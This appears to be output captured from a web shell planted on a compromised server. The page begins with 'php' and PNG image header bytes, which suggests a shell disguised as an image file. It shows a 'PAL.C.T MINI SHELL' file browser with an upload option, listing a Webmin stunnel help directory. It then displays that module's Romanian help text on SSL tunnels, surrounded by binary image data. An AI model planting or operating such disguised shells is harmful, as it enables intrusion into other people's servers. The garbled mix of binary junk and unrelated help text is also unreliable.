php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.ro.auto.html

<header> Introducere în tunelurile SSL </header> SSL este un protocol pentru criptarea datelor într-o conexiune TCP pe măsură ce se deplasează prin rețea. Acesta a fost inițial dezvoltat pentru a proteja traficul între browserele web și servere, dar poate fi folosit pentru a cripta orice fel de flux de date care ar fi în mod normal trimis prin protocolul TCP. <p> Protocolul SSL permite clienților și serverelor să se autentifice reciproc, astfel încât un client poate fi sigur că se conectează cu adevărat la gazdă, despre care crede că este. Aceasta se face folosind certificate eliberate de o autoritate de certificare recunoscută de client (pentru a putea fi verificate) și asociate cu un anumit nume de gazdă. Fără certificate, un atacator ar putea redirecționa o conexiune SSL către propriul său server și să capteze informații sensibile de la un client care crede că vorbește cu serverul real. <p> Orice date care călătorește pe Internet necriptate pot fi capturate și citite de un atacator cu acces la una dintre rețelele prin care trece. Chiar și datele care călătoresc între un client și un sistem server pe o rețea LAN pot fi ascultate cu ușurință. Atunci când vă conectați la un telnet, FTP sau server POP3, parola dvs. este trimisă prin rețea și astfel poate fi capturată de un atacator. <p> SSL poate fi utilizat pentru a proteja datele în astfel de situații, dar numai dacă atât clientul cât și serverul îl acceptă. Majoritatea browserelor web și clienților de poștă pot realiza conexiuni HTTP, POP3 și IMAP criptate SSL, dar nu toate serverele web și POP3 le pot accepta. POP3, în special, este greu de protejat, deoarece serverul standard care vine cu majoritatea sistemelor Unix nu acceptă deloc SSL. Din fericire, deși există o soluție - Stunnel. <p> STunnel este un program simplu care transformă o conexiune necriptată într-una criptată SSL. De obicei este configurat să fie rulat de pe un super-server, cum ar fi inetd sau xinetd, și apoi rulați un alt program precum serverul POP3 care nu acceptă SSL. Acest design îi permite să protejeze orice server care este rulat în mod normal de la inetd, cum ar fi serverele telnet, NNTP și IMAP. <p> Nu toate serverele pot fi protejate în mod util cu criptare, deoarece nu există niciun client care să le utilizeze în modul SSL. De exemplu, nu am auzit niciodată de un client telnet sau FTP care poate folosi SSL, deoarece pachetul SSH comun permite deja logări la distanță criptate și transferuri de fișiere. <p> Acest modul Webmin facilitează configurarea serviciilor super-server care rulează STunnel pentru a porni un program de server. Chiar dacă acest lucru se poate realiza manual folosind modulul Servicii Internet, acesta este conceput special pentru configurarea și configurarea STunnel. Acesta detectează automat dacă aveți inetd și / sau xinetd instalate, le citește configurațiile pentru a verifica dacă există tuneluri SSL existente și le adaugă la crearea unui nou tunel. Dacă ambele sunt instalate, noi tuneluri SSL sunt adăugate la configurația xinetd, deoarece este superior celor două, după părerea mea. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`